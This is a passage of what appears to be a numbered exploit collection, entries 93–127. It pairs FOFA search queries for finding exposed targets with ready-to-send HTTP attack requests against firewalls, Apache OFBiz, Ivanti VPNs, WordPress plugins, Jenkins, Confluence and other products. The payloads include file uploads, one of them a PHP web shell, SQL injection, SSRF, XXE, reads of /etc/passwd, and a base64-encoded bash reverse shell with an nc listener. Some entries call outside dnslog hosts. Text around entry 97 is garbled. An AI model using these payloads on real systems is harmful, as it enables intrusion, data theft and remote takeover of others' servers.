User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

Note the custom Testcmd header carrying the command; the JSON body is the elided Fastjson payload.

93. Qi An Xin (奇安信) Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin (奇安信) Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (same directory as entry 93, under the name given in the upfile part):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
0 I/ n8 T5 U5 u( H* p97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 ]" e I2 P* j+ M1 |
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"; Q; N# n( V! H6 l8 Z
GET /passport/login/ HTTP/1.1* ~- b4 u# G+ ^
Host: 192.168.40.130:8085
, n' o3 {4 {4 c0 n- Z9 W3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" J* o( _1 |1 P- Z H! P. S2 m% sAccept-Encoding: gzip" M+ Q. P. M' `2 T- B
Connection: close9 Y; l/ `; {8 A; B- p# L
Cookie: rememberMe=PAYLOAD
* K; a: I7 n* ]! e( p5 C) aX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
' V1 H$ i" D! u9 r0 a
1 y; N6 Y1 p% ~5 }" a+ o1 o5 W) ~7 W: ]& h l
98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}
105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php.

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
